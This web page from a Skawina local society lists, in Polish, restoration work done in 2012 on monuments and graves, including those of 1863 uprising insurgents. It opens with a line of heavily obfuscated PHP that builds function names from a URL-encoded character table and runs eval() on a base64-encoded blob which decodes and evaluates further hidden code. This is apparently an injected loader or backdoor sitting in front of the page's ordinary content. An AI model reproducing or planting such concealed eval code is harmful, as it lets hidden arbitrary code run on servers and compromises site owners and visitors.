$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("JE8wTzAwMD0iRG9oSHpPY2luc0xDZ1V5R1JQbUt1UWVxRmpKWmF3QkFmVlRJZFdrYnhsdnByU3RZWE1ORWFQa215aXFkV1NjTkZCTW5sVll2dWJlQ1JLSnpwRVpPZ3JIakl3aGZvVVhER0xBc3h0UVRWYTlFcG1PRmFiUD0iO2V2YWwoJz8+Jy4kTzAwTzBPKCRPME9PMDAoJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAqMiksJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAsJE9PMDAwMCksJE9PME8wMCgkTzBPMDAwLDAsJE9PMDAwMCkpKSk7")); ?> PRACE WYKONANE W 2012 R. | Towarzystwo Przyjaciół Skawiny

Towarzystwo Przyjaciół Skawiny

PRACE WYKONANE W 2012 R.

data dodania: 30 grudnia 2012

Pomnik Maryi Ocetkiewiczowej – prace renowacyjne obejmowały: wykonanie fundamentu, usunięcie patyny, odkucie na nowo zwieńczenia z krzyżem, rekonstrukcja liternictwa, uzupełnienie ubytków, impregnację.

Nagrobek ks, Joannesa Mordzińskiego – prace renowacyjne obejmowały: odczyszczenie, wykonanie pokrywy z piaskowca, wyłożenie kostki granitowej wokół grobowca.

Nagrobek  ks. Josephiusa Oleaczka – ksiądz poniósł poważne represję za sprzyjanie skawinianom, biorącym udział w powstaniu styczniowym – prace renowacyjne obejmowały: posadowienie płyty nagrobnej na cio­sach z piaskowca i wyłożenie kostki granitowej wokół nagrobka.

Nagrobek  Józefa Zaręby – powstańca z 1863 r. – prace renowacyjne obejmowały: umycie z brudu, uzupełnienie ubytków, impregnację.

Pomnik Kwatera Powstańców z 1863r –  prace renowacyjne obejmowały: odczyszczenie kamienia, impregnację, malowanie metalowych krzyży, spoinowanie kamienia.